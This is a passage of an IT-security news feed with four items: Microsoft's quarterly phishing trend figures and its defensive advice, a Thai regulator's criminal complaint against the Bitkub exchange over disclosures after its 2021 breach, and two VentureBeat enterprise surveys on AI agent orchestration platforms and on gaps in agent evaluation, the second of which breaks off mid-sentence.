<p class="wp-block-paragraph">Riding this shift in were a few notable phishing campaigns, including an automated <a href="https://www.csoonline.com/article/575559/business-email-compromise-scams-take-new-dimension-with-multi-stage-attacks.html">business email compromise</a> (BEC) campaign that reached 42,000 organizations in under three hours, and a multi-stage phishing campaign that used nested email (EML) files, calendar invitations, and a Microsoft authentication redirect to deliver malware.</p>



<p class="wp-block-paragraph">To counter phishing attacks, Microsoft recommends blocking emails containing known bad URLs/ subject fields, enabling password-less authentication methods, or moving to <a href="https://www.csoonline.com/article/4176814/security-experts-caution-mfa-alone-can-no-longer-stop-threat-actors.html">MFA</a> for accounts that still require passwords.</p>



<h2 class="wp-block-heading">Tycoon2FA disruption sent attackers exploring</h2>



<p class="wp-block-paragraph">The take-down of <a href="https://www.csoonline.com/article/4100393/hybrid-2fa-phishing-kits-are-making-attacks-harder-to-detect.html">Tycoon2FA</a> forced its operators to abandon portions of their infrastructure and rework hosting, domain registrations, and delivery mechanisms.</p>



<p class="wp-block-paragraph">“After falling 15% in March and another 22% in April, Tycoon2FA-linked phishing volume dropped 74% in May to just 1.5 million messages, then fell another 20% in June to 1.2 million, by far the lowest monthly volumes observed in at least a year,” Microsoft said.</p>



<p class="wp-block-paragraph">The decline extended to QR Code <a href="https://www.csoonline.com/article/3557585/attackers-are-using-qr-codes-sneakily-crafted-in-ascii-and-blob-urls-in-phishing-emails.html">lures</a> and fake CAPTCHA <a href="https://www.csoonline.com/article/3829416/fake-captcha-attacks-are-increasing-say-experts.html">pages</a>, two phishing techniques in which Tycoon2FA accounted for 12% and 14% of industry activity in June, respectively. This indicated that the platform’s customer base had not been able to migrate to a replacement infrastructure.</p>



<p class="wp-block-paragraph">But cutting off one head of the hacker hydra only gave rise to new tactics elsewhere.</p>



<p class="wp-block-paragraph">The adaptation came in the form of using Microsoft <a href="https://www.csoonline.com/article/4160858/attackers-abuse-microsoft-teams-to-impersonate-the-it-helpdesk-in-a-new-enterprise-intrusion-playbook.html">Teams as a social engineering channel</a>. Attackers established conversations to build trust before attempting credential theft or delivering malicious payloads. “Teams-based phishing volume climbed steadily throughout Q2, with the average number of detected attacks rising 19% from March to April, holding roughly flat into May (+1%), then increasing another 10% into June,” Microsoft said.</p>



<p class="wp-block-paragraph">Microsoft also observed a highly automated BEC campaign that reached over 67,000 users using scripted emails, Amazon Simple Email Service (SES), and engagement tracking, alongside a separate phishing campaign targeting 107,000 users that abused Microsoft’s authentication flow and trusted cloud services, including Teams archive recording and ICS calendar invite, to disguise malware delivery behind legitimate infrastructure.</p>



<h2 class="wp-block-heading">Phishing changes but the defense doesn’t</h2>



<p class="wp-block-paragraph">While QR Code and Captcha-based phishing attacks dropped significantly in the second quarter, business email compromise (BEC) charted jumped 121% between March and April, before dropping down again in May.</p>



<p class="wp-block-paragraph">QR Code phishing represented 8.3 million attacks in June 2026, down from a peak of 18.7 million in March. Similarly, Captcha-gated phishing fell from 12 million attacks in March to 2.2 million in June.</p>



<p class="wp-block-paragraph">BEC attacks hit 9 million in March, falling to 3.9 million in June.</p>



<p class="wp-block-paragraph">But even as these phishing classics lost momentum and newer techniques emerged, Microsoft’s defensive advice remained rooted in the basics. It noted organizations should complement email filtering with phishing-resistant authentication such as passkeys and phishing-resistant <a href="https://www.csoonline.com/article/3535222/mfa-adoption-is-catching-up-but-is-not-quite-there.html">MFA</a> to reduce the effectiveness of credential theft campaigns.</p>



<p class="wp-block-paragraph">The company also recommended strengthening Exchange Online Protection and Microsoft Defender for Office 365 with capabilities such as Safe links and Zero-hour Auto Purge (ZAP), in which malicious emails already delivered to mailboxes are removed before they are read, alongside enforcing password-less authentication methods like Windows Hello, <a href="https://www.csoonline.com/article/4040128/fido-undermined.html">FIDO </a>keys, and Microsoft Authenticator.</p>



<p class="wp-block-paragraph">Microsoft concluded its report with a list of indicators of compromise (IoCs) from the threats observed in the quarter to support detection efforts.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thailand SEC Files Criminal Complaint Against Bitkub Over 2021 Cyberattack]]></title>
<description><![CDATA[Thailand's cryptocurrency exchange Bitkub has rejected allegations of fraud after the Thailand SEC filed a criminal complaint related to the company's disclosures following the Bitkub cyberattack in 2021. The case focuses on how the exchange reported the impact of the cyberattack on Bitkub to reg...]]></description>
<link>https://tsecurity.de/de/3690896/it-security-nachrichten/thailand-sec-files-criminal-complaint-against-bitkub-over-2021-cyberattack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690896/it-security-nachrichten/thailand-sec-files-criminal-complaint-against-bitkub-over-2021-cyberattack/</guid>
<pubDate>Fri, 24 Jul 2026 09:10:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="832" height="515" src="https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Bitkub cyberattack" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack.webp 832w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-300x186.webp 300w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-768x475.webp 768w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-600x371.webp 600w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-150x93.webp 150w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-750x464.webp 750w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack.webp 832w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-300x186.webp 300w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-768x475.webp 768w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-600x371.webp 600w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-150x93.webp 150w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-750x464.webp 750w" sizes="(max-width: 832px) 100vw, 832px" title="Thailand SEC Files Criminal Complaint Against Bitkub Over 2021 Cyberattack 1"></p><span data-contrast="auto">Thailand's cryptocurrency exchange Bitkub has rejected allegations of fraud after the Thailand SEC filed a criminal complaint related to the company's disclosures following the Bitkub cyberattack in 2021. The case focuses on how the exchange reported the impact of the cyberattack on Bitkub to regulators, rather than on the safety of customer funds.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">In response to the complaint, Bitkub stated that all customer assets currently held on its platform remain safe, fully accounted for, and protected in accordance with applicable regulations. The company argued that the allegations stem from decisions made during the aftermath of the 2021 <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="29116">security</a> breach and do not reflect fraudulent conduct.</span><span data-ccp-props="{}"> </span>
<h3><strong>Thailand SEC Files Complaint Over the 2021 Bitkub Cyberattack </strong></h3>
<span data-contrast="auto">On 23 July 2026, the<a href="https://www.sec.or.th/EN/Pages/News_Detail.aspx?SECID=13139" target="_blank" rel="nofollow noopener"> Thailand SEC filed a criminal complaint</a> against Bitkub Online Co., Ltd. and its former directors, Sakolkorn Sakavee and Thaweesap Rawan. The regulator alleged that the company's daily net capital reports submitted between 10 May and 30 October 2021 failed to accurately reflect the material reduction in its digital asset holdings caused by the Bitkub <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="29115">cyberattack</a>.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">According to the regulator, the reports did not disclose the impact of the theft on the company's asset balance. The Thailand SEC also accused the two former directors of making false entries in company documents that gave the impression that customer assets were still being held normally and that the company had not suffered any damage.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The complaint has been referred to Thailand's Economic Crime Suppression Division for further investigation. Following that process, the matter may be forwarded to prosecutors and the courts. The Thailand SEC noted that filing a <a href="https://thecyberexpress.com/fake-emails-scam-indians-heres-what-to-know/" target="_blank" rel="noopener">criminal complaint</a> does not represent a final determination of guilt.</span><span data-ccp-props="{}"> </span>
<h3><strong>Bitkub Says Disclosure Decision was Intended to Prevent Customer Losses</strong></h3>
<span data-contrast="auto">Following media reports about the complaint, <a href="https://www.linkedin.com/posts/on-23-july-2026-news-reports-emerged-regarding-share-7486045546315694081-abKc/?utm_source=share&amp;utm_medium=member_android&amp;rcm=ACoAAAfAnJwBMfzai0rLzfzxnZE_NCnVt2ZLE_o" target="_blank" rel="nofollow noopener">Bitkub published a statement on LinkedIn</a> explaining its position on the cyberattack and the subsequent reporting decisions.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The company said the allegations relate to an incident in early May 2021, when one of its digital asset wallets was compromised by cybercriminals. Bitkub acknowledged that the breach was not disclosed at the time.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">According to the company, the individual responsible for disclosure obligations deliberately withheld information about the wallet compromise. Bitkub said the decision was made to avoid triggering a "bank run," or mass withdrawals of digital assets by customers, while the company worked to replace the stolen assets.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The exchange stated:</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">"The decision of such individual not to disclose the incident was made with the intention to prevent a bank run—that is, a mass withdrawal of digital assets by customers upon learning of the theft—which could have rendered the Company unable to procure sufficient replacement digital assets for the customers while the recovery process was still ongoing."</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Bitkub added that such a scenario could have resulted in significant customer losses and broader damage to Thailand's digital asset industry.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The company also stressed that, at the time of the Bitkub <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-a-cyber-attack/" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="29117">cyberattack</a>, all of its digital asset wallet security systems complied with standards prescribed by the relevant authorities and had been audited.</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">Co-founders Replaced Stolen Assets After Cyberattack on Bitkub</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Although the digital assets stolen during the cyberattack on Bitkub were never recovered, the company said its co-founders voluntarily absorbed the <a href="https://thecyberexpress.com/keytronic-reveals-million-loss-cyberattack/" target="_blank" rel="noopener">financial loss</a>.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">According to Bitkub, the co-founders purchased digital assets matching the same types and quantities as those stolen and transferred them to the company. As a result, the exchange said neither its customers nor the business ultimately suffered any financial loss from the incident.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">In its statement, Bitkub said:</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">"As no bank run occurred, even though the stolen digital assets could not be recovered, the Co-Founders of the Bitkub Group voluntarily absorbed the loss by purchasing equivalent digital assets (in the same type and quantity as those stolen) and providing them to the Company. Consequently, neither the Company nor its customers suffered any financial loss from the theft."</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">Thailand SEC Previously Confirmed Customer Assets Were Intact</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Bitkub also pointed to the findings of an earlier inspection conducted by the Thailand SEC after reports of the Bitkub cyberattack surfaced online.</span><span data-ccp-props="{}"> </span><span data-contrast="auto">According to the company, the regulator verified that, as of 8 September 2025, all customer assets held by the exchange were safe and fully accounted for.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The company reiterated this point in its latest statement, saying:</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">"At the outset, for the sake of clarity and mutual understanding, the Company wishes to affirm that all customers' assets currently held by the Company are safe and fully accounted for. The Company reiterates its strict compliance with all applicable laws and regulations in safeguarding and maintaining customer assets."</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Bitkub maintained that the criminal complaint relates to historical reporting practices between May and October 2021, more than five years ago, rather than to the current condition of customer assets or any ongoing security concerns.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">As the investigation proceeds, the case will determine whether the company's reporting following the Bitkub cyberattack complied with regulatory requirements. For now, the complaint remains an allegation, and the legal process involving the Thailand SEC, investigators, prosecutors, and the courts has yet to reach a final conclusion.</span><span data-ccp-props="{}"> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic orchestration: Enterprise AI organizations have a deployment problem, not a platform problem — and most are calling chatbots agents]]></title>
<description><![CDATA[Across 101 enterprises, agent orchestration is consolidating onto model-provider platforms — Anthropic’s Claude leads by a wide margin — chosen for the gravity of the underlying model and judged on reliable multi-step execution. But the ambition runs well ahead of the reality: most deployed “agen...]]></description>
<link>https://tsecurity.de/de/3689830/it-nachrichten/agentic-orchestration-enterprise-ai-organizations-have-a-deployment-problem-not-a-platform-problem-and-most-are-calling-chatbots-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689830/it-nachrichten/agentic-orchestration-enterprise-ai-organizations-have-a-deployment-problem-not-a-platform-problem-and-most-are-calling-chatbots-agents/</guid>
<pubDate>Thu, 23 Jul 2026 19:19:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 101 enterprises, agent orchestration is consolidating onto model-provider platforms — Anthropic’s Claude leads by a wide margin — chosen for the gravity of the underlying model and judged on reliable multi-step execution. But the ambition runs well ahead of the reality: most deployed “agents” are still chatbot wrappers, the control plane enterprises expect is deliberately hybrid to avoid lock-in, and real-time fiscal control over token burn remains the exception.</p><p>This wave of VentureBeat Pulse Research examines enterprise agent orchestration: which platforms enterprises run on, what drives the choice, what they optimize for, how they expect agent control to be structured, and — most revealingly — how orchestrated their deployed “agents” actually are and how tightly they control the cost of running them.</p><p>The central finding is a gap between orchestration ambition and orchestration reality. Enterprises are consolidating fast onto the major model platforms: Anthropic’s Claude is the primary platform for 40%, more than double any rival, followed by Microsoft (18%) and OpenAI (13%). The choice is driven by “model gravity” — native alignment with a state-of-the-art base model (21%) — and success is judged by reliable, multi-step execution (task completion reliability 32%, multi-step workflow management 28%). Yet asked to assess their portfolios honestly, 71% say a quarter or fewer of their deployed “agents” are true multi-step orchestrated workflows rather than single-prompt chatbot wrappers, and only 10% have crossed the halfway mark. The orchestration layer is being built well ahead of the orchestrated portfolio it is meant to run.</p><p>That gap shapes the architecture enterprises are putting in place. By the end of 2026 a clear majority (51%) expect a hybrid control plane — provider-native plus external orchestration — and only 6% expect to hand control to a provider-managed service, because vendor lock-in (35%) is the risk they fear most if control lives inside a model provider. Investment follows the build-out: agent workflow tooling leads the spend (34%), with security and permissions enforcement (25%) behind. And fiscal control lags throughout — more than a quarter (27%) have no real-time way to stop a runaway agent before the bill arrives.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series, this instrument focused on enterprise agent orchestration. Responses are filtered to organizations with 100 or more employees (n=101), drawn from a single June 2026 wave; because this is one wave rather than a pooled multi-month sample, the report reads cross-sectionally and does not infer month-over-month trends.</p><p>By organization size the sample is spread evenly across the enterprise bands: 100–499 employees, 2,500–9,999, and 50,000+ (21% each), with 10,000–49,999 and 500–2,499 (19% each). By role it is senior and buyer-credible: product and program managers (15%), CIO/CTO/CISO (13%), consultants and advisors (13%), and a spread of data, AI, and engineering directors and VPs, with an “Other” function at 18%. On purchasing, 81% are recommenders, influencers, or final decision-makers for AI solutions (66% recommender/influencer, 15% final decision-maker). Technology/Software is the largest industry at 44%, followed by Financial Services (17%) and Healthcare/Life Sciences (8%).</p><p>At 101 respondents the sample is robust enough to read directionally with reasonable confidence, though it remains self-selected and is not a probability sample.</p><h2>Finding 1: Orchestration runs on model-provider platforms</h2><p><b>Anthropic’s Claude leads; open frameworks are marginal</b></p><p>We asked which agent orchestration platform enterprises primarily use today. The answer concentrates on the major model providers — and on one in particular.</p><div></div><p>A note on reading these shares. As described in the methodology section, the respondents are self-selected, and this question asked them for a single primary platform — so the figures measure which platform leads each enterprise's deployment, within a self-selected audience of AI-active technical decision-makers. A sample built this way can diverge substantially from spend-weighted market measures, and each VB Pulse survey draws its own sample with its own company-size mix, so vendor figures should not be compared across our surveys either. Read these shares as a portrait of where this cohort has placed its primary orchestration bet today, rather than as market share.</p><p>The model platforms dominate. Anthropic, Microsoft, OpenAI, Google, and Amazon together account for roughly 80% of deployments (81 of 101), while the open frameworks (LangChain/LangGraph) and custom in-house builds that anchor engineering discussion sit in single digits. Anthropic’s lead — 40%, more than double the next platform — mirrors the “model gravity” selection logic in Finding 2: enterprises are choosing the orchestration layer that comes with the model they want to build on. As with the security vendors in the prior agent-security wave, the tools that define the category in technical circles are not yet where enterprise deployment concentrates. A small 3% are not orchestrating at all.</p><p>Respondents rate the platforms they run at 3.94 out of 5 overall (109 answered), with “value for money” specifically at 3.94 and “ease of implementation” the weakest score, at 3.85 — placing orchestration near the bottom of our five-tracker satisfaction range, ahead of only evaluation tooling. A rating just under 4 out of 5, from users of whom 96% plan to change their orchestration approach within the year, reads as provisional acceptance: the platforms work well enough to run today, and not well enough to stop the search for something better. The ratings sit alongside near-universal intent to change; this is a layer enterprises tolerate more than they love.</p><h2>Finding 2: Model gravity drives platform selection</h2><p><b>The base model, not the tooling, decides the platform</b></p><p>We asked what most influenced the orchestration platform choice. The single largest factor is the pull of the underlying model — though flexibility and ease of development follow close behind.</p><div></div><p>Model gravity leading is the selection-side explanation for Anthropic’s platform lead: enterprises pick the orchestration environment closest to the frontier model they have standardized on. But the next tier complicates the picture — flexibility across models and tools (17%) and ease of development (17%) say enterprises also want to avoid being trapped by that choice, foreshadowing the lock-in fear in Finding 6. Security and permissions (14%) and total cost of ownership (11%) round out a pragmatic buying logic. Performance (latency/memory) sits last at 4%, a reminder that at this stage of adoption the binding constraints are model fit and optionality, not raw speed.</p><h2>Finding 3: The job is reliable multi-step execution</h2><p><b>Enterprises just orchestration by whether it completes the work</b></p><p>We asked what enterprises optimize for — their primary success metric for orchestration. Reliability and multi-step workflow management dominate; developer- and user-facing metrics trail.</p><div></div><p>Task completion reliability (32%) and multi-step workflow management (28%) together account for 59% of responses (60 of 101): orchestration succeeds, in the enterprise view, when it reliably carries a task through multiple steps to completion. Developer productivity (17%) matters but is secondary — the inverse of its prominence in framework discussion — and end-user experience (9%) is a minor concern, consistent with orchestration being an internal execution problem rather than a UX one. This reliability-first standard is exactly what makes the Chatbot Trap finding so pointed: enterprises define success as dependable multi-step execution, yet most of their deployed “agents” do not yet do multi-step work at all.</p><p>The trap is not evenly distributed. Splitting the sample by organization size, 77% of smaller enterprises say a quarter or fewer of their agents do true multi-step work, against 62% of larger ones. Larger enterprises are meaningfully further into genuine multi-step deployment; the chatbot trap is, directionally, a mid-market condition.</p><h2>Finding 4: Consolidate, productionize, and build in-house </h2><p><b>Three strategic moves are nearly tied for the year ahead</b></p><p>We asked what major change enterprises anticipate in their orchestration strategy over the next 12 months. Three moves cluster at the top, almost evenly split.</p><div></div><p>The top three — building in-house control (25%), standardizing on one framework (24%), and moving agents from sandbox to production (23%) — are statistically indistinguishable and tell a single story: enterprises are moving from experimentation to operational consolidation. They want fewer frameworks, more production exposure, and more ownership of the control layer; only 4% expect no change. The appetite for custom in-house control planes is notable alongside the platform concentration in Finding 1 — enterprises are standardizing on model-provider platforms while simultaneously planning to wrap them in control logic they own, the hybrid posture that Finding 6 makes explicit.</p><h2>Finding 5: Nearly seven in 10 plan to switch — and the biggest group of movers has no shortlist </h2><p>The strategic change enterprises anticipate (previous finding) comes with vendor motion attached. Asked whether they plan to adopt a new, additional, or replacement agent orchestration platform in the next twelve months, more respondents are moving here than in any other layer we track.</p><div></div><p>Asked which platforms they are considering, the most common answer among those in motion is none yet: 29% of all respondents are evaluating without a shortlist, the largest single response after "not considering a change." Among named candidates, OpenAI leads at 16%, followed by LangChain/LangGraph at 12% and Anthropic at 7% — and notably, the independent frameworks draw roughly double their current usage footprint in forward consideration, the same pattern our security tracker found for specialist vendors. Read with this report's concentration and lock-in findings, the picture completes itself: the major model-platform providers hold roughly four-fifths of today's primary usage, vendor lock-in has become the leading fear, 96% anticipate a strategic change — and now the purchase intent to act on all of it, with the largest bloc of buyers still undecided. The most concentrated layer of the agentic stack is also, as of June, the least settled.</p><h2>Finding 6: Investment flows to workflow tooling</h2><p><b>Tooling and permissions lead the spend; monitoring trails</b></p><p>We asked which orchestration-related investment will grow most next year. Agent workflow tooling leads, with security and permissions enforcement behind.</p><div></div><p>Workflow tooling leading (34%) is the budget-side expression of the reliability-and-multi-step priority in Finding 3: the money is going to the machinery that strings steps together dependably. Security and permissions enforcement (25%) and scaling infrastructure (20%) follow — the investments required to take agents from sandbox into production, the strategic move in Finding 4. Monitoring and debugging draws a smaller 11%, with another 11% reporting flat budgets. The weight on tooling, permissions, and scaling over pure observability signals that enterprises are spending to build and harden orchestration, not merely to watch it run.</p><h2>Finding 7: The control plane will be hybrid — and lock-in is why</h2><p><b>Enterprises expect to split control between providers and their own layer</b></p><p>We asked where enterprises expect the primary control plane for agents to live by the end of 2026, and what worries them most if that control sits inside a model-provider platform. A clear majority expect a hybrid model — and vendor lock-in is the reason.</p><div></div><p>Hybrid control is the dominant expectation by a wide margin (51%), and only 6% expect to hand control to a provider-managed service outright. Read together, the hybrid, custom, and externally-abstracted options — every architecture that keeps control at least partly outside the provider — sum to 88% (89 of 101). The reason surfaces directly when we asked about the risk of provider-resident control: vendor lock-in leads at 35% (35 of 101), ahead of security and permissioning limitations (28%) and inflexibility across models and tools (21%). The pattern echoes the prior wave’s “don’t trust the model to police itself” posture — here, enterprises will build on a provider’s platform but decline to be governed entirely by it. The hybrid control plane is the architectural hedge against the lock-in they most fear.</p><p>The June figure asserting a preference for a hybrid control plane marks movement from earlier. In the April–May survey (n=145), only 34% expected a hybrid control plane, and a greater number (12%) expected to hand control fully to a provider-managed service. These two snapshots don’t yet measure a confirmed longitudinal trend — but the direction of the conversation is unambiguous: toward keeping control.</p><p>Lock-in is also a new arrival as a top concern. In the April–May wave, the leading concern was security and permissioning limitations (32%), with lock-in second at 24%; by June the two had traded places. The worry about provider platforms appears to be maturing from whether they can be secured to whether they can be replaced.</p><h2>Finding 8: The chatbot trap — most “agents” aren’t agents yet</h2><p><b>Enterprises admit most deployments are still chatbot wrappers</b></p><p>We asked enterprises to assess their portfolios honestly: what share of their deployed “agents” are true multi-step orchestrated workflows versus simple single-prompt chatbot wrappers. The answer is the defining finding of this wave.</p><div></div><p>This is the gap at the center of the report. Combining the bottom two bands, 71% of enterprises (72 of 101) say a quarter or fewer of their deployed “agents” are genuinely orchestrated — and just 10% (10 of 101) have crossed the halfway mark. The ambition documented in the earlier findings — model-provider platforms, reliability-first success metrics, production rollouts, a deliberate control architecture — runs well ahead of the deployed reality, which remains overwhelmingly single-prompt assistants dressed as agents. This is less a contradiction than a roadmap: the platforms, budgets, and strategies are being put in place precisely because the orchestrated portfolio is still so thin. The open question for later waves is how fast the reality closes on the ambition.</p><h2>Finding 9: Fiscal control is still reactive</h2><p><b>Only a minority can stop a runaway agent before the bill arrives</b></p><p>Finally, we asked how enterprises enforce fiscal control over agent token consumption — the risk that an autonomous loop exhausts a budget before anyone intervenes. Most rely on native caps or after-the-fact monitoring; real-time programmatic control is the exception.</p><div></div><p>More than a quarter of enterprises (27%) admit they have no real-time, programmatic way to stop an agent before a budget-breaking bill arrives — they learn of it from the logs afterward. Another 32% lean entirely on the native caps and throttles built into their primary platform, a control only as good as the provider’s tooling and one that ties back to the lock-in concern of Finding 6. The enterprises building custom gateways (23%) or exploiting cross-model routing to arbitrage cost (19%) are the ones treating token burn as an engineering problem to be controlled deterministically. As with orchestration maturity, fiscal control is an area where the operational reality lags the ambition: agents are moving toward production faster than the cost-control plane around them is being built.</p><p>It’s worth noting, a split appears according to company size: roughly one in three enterprises under 2,500 employees (34%) exercises only reactive control of agent spend, against 20% of larger enterprises — directional figures, but consistent with the chatbot-trap split. The mid-market is running the least mature agents on the least instrumented budgets.</p><h2>The bottom line: The layer is real; most of the agents aren't yet</h2><p>Organizations with 100 or more employees describe an orchestration strategy that is consolidating quickly and maturing slowly. They are standardizing — for now — on model-provider platforms, which collectively hold roughly four-fifths of primary usage, chosen for the gravity of the underlying model, and they judge success by reliable multi-step execution. Investment is flowing to workflow tooling and permissions, the strategy is to consolidate frameworks and push agents into production, and the control plane they expect is deliberately hybrid, because vendor lock-in is the risk they fear most. But the standardization is provisional: 68% plan to adopt a new, additional, or replacement orchestration platform within twelve months — the highest switching intent of any layer we track — and the largest group of those movers has not yet shortlisted a candidate. Today's concentration describes where enterprises are, and visibly does not describe where they intend to stay.</p><p>But the honest self-assessment punctures the ambition. Seventy-one percent say a quarter or fewer of their deployed "agents" are truly orchestrated, only 10% are past the halfway mark, and more than a quarter cannot stop a runaway agent in real time. The orchestration layer — the platforms, the budgets, the control architecture — is being built ahead of the orchestrated portfolio it is meant to run. At 101 respondents in a single June wave this reads as a clear directional signal rather than a precise measurement: enterprises have decided how they want to orchestrate agents well before most of their agents are doing anything an orchestration layer is for. The questions for subsequent waves are whether the deployed reality closes the gap on the ambition — and, with nearly seven in ten buyers in motion and most of them undecided, which platforms the settled stack finally lands on.</p><hr><p><i>Based on survey responses from 101 qualified enterprise respondents (100+ employees), drawn from a single June 2026 wave. Because this is one wave rather than a pooled multi-month sample, results read directionally rather than as a confirmed trend. Respondents include product and program managers, CIOs, CTOs and CISOs, consultants and advisors, and directors and VPs of data, AI, and engineering, across Technology/Software, Financial Services, Healthcare, and other sectors.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The agent evaluation gap: Enterprise AI organizations have a reality-alignment problem, not a coverage problem — and most are shipping to production anyway]]></title>
<description><![CDATA[Across 157 enterprises, organizations are granting AI agents more autonomy while trusting the evaluations meant to gate that autonomy less. Half have already shipped an agent that passed their internal evaluations and then failed a customer in production; only one in twenty fully trusts automated...]]></description>
<link>https://tsecurity.de/de/3689829/it-nachrichten/the-agent-evaluation-gap-enterprise-ai-organizations-have-a-reality-alignment-problem-not-a-coverage-problem-and-most-are-shipping-to-production-anyway/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689829/it-nachrichten/the-agent-evaluation-gap-enterprise-ai-organizations-have-a-reality-alignment-problem-not-a-coverage-problem-and-most-are-shipping-to-production-anyway/</guid>
<pubDate>Thu, 23 Jul 2026 19:19:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 157 enterprises, organizations are granting AI agents more autonomy while trusting the evaluations meant to gate that autonomy less. Half have already shipped an agent that passed their internal evaluations and then failed a customer in production; only one in twenty fully trusts automated evaluation today; and the most-cited weakness is that evaluations do not align with real-world outcomes. Yet two-thirds already allow, or are actively engineering toward, deploying agent changes to production on automated evaluation alone — with no human in the loop. The result is an evaluation gap — the distance between how much autonomy enterprises are handing their agents and how far they trust the tests that are supposed to catch the failures.</p><p>This wave of VentureBeat Pulse Research examines how technical leaders measure agent performance: which reliability and evaluation platforms they use, how they select and trust them, what breaks in production, and how far they are willing to let agents run without a human in the loop.</p><p>The central finding is an evaluation gap — the distance between the autonomy enterprises are granting their agents and the trust they place in the evaluations meant to govern it. Half of organizations (50%) have, in the past year, deployed an agent or LLM feature that passed their internal evaluations and then caused a customer-facing failure, and a quarter have seen it happen more than once. Trust in the tests themselves is thin: only 5% say they fully trust automated evaluation today, and the single most-cited limitation is that evaluations align poorly with real-world outcomes (29%). Enterprises are discovering that a passing eval is not the same as a working agent.</p><p>What makes the gap consequential is the direction of travel. Two-thirds of organizations (66%) already permit fully automated, zero-human-in-the-loop deployment for low-risk agents (34%) or are actively engineering their pipelines to allow it within twelve months (33%). At the same time, the evaluation stack that would have to earn that trust is fragmented and immature: the most common primary tools are the model providers’ native evals, tied with having no dedicated tooling at all (17% each); and only about a quarter of enterprises run real-time quality checks on live production traffic. The autonomy is arriving faster than the assurance.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series, this survey — the Agentic Reliability &amp; Evals tracker — focused on how technical leaders evaluate agent performance and reliability. Responses are filtered to organizations with 100 or more employees (n=157), drawn from a single survey in June 2026; because this is one wave rather than a pooled multi-month sample, the report reads cross-sectionally and does not infer month-over-month trends. Where questions were multiple-select, those shares can sum to more than 100%.</p><p>By role the sample is senior and buyer-credible: 38% are final decision-makers for AI purchases and another 34% recommenders or influencers. Product and program managers (15%), consultants and advisors (10%), directors of engineering/IT (8%), and CIOs/CTOs/CISOs (8%) lead the named titles, alongside a large “Other” function (37%). By organization size the sample is mid-market-weighted: 100–499 (37%) and 500–2,499 (27%) employees lead, with 2,500–9,999 (20%), 10,000–49,999 (10%), and 50,000+ (6%) above them. Technology/Software is the largest industry at 23%, followed by Retail/Consumer (15%), Healthcare/Life Sciences (12%), and Manufacturing (10%).</p><p>At 157 respondents the sample is large enough to read directionally but should be treated as a directional signal rather than a precise measurement; it is self-selected and is not a probability sample. It skews toward the mid-market, so it is best read as the view from organizations actively standing up agent evaluation practices rather than from the largest operators.</p><p><i>Note: This survey was rebuilt for the June wave from the earlier “LLM observability and evaluations” survey; because the questions and sample differ, no comparisons are made to the April–May data.</i></p><h1>Finding 1: A passing eval is not a working agent</h1><p><b>Half have shipped an agent that passed evals, then failed a customer</b></p><p>We asked whether, in the past 12 months, organizations had deployed an agent or LLM feature that passed their internal evaluations but then caused a customer-facing failure. Half of those that run evaluations had.</p><div></div><p>This is the report’s defining number. Half of organizations (50%) have shipped an AI feature that cleared their internal evaluations and then failed in front of a customer — an incorrect output, a broken workflow, or a quality incident — and a quarter have seen it happen more than once. Only 36% report no such failure, and the remainder either run no pre-deployment evaluations (8%) or don’t track the root 